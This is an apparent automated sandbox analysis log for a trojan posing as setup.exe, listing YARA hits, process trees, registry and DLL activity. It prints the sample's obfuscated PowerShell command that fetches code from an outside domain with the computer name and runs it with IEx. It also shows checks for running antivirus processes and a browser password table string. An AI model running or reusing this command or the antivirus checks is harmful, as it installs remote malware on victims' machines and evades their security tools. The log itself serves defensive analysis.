          Source: setup.exe, 00000000.00000003.2013104825.0000000003CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs setup.exe
          Source: setup.exeBinary or memory string: WM/OriginalFilename vs setup.exe
          Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0AC0 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_007B0AC0
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
          Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeJump to behavior
          Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;WRSA.EXE&apos;
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;OPSSVC.EXE&apos;
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSWSCSVC.EXE&apos;
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SOPHOSHEALTH.EXE&apos;
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
          Source: setup.exe, 00000000.00000003.1841620339.0000000003677000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829599046.0000000003695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
          Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?Jump to behavior
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
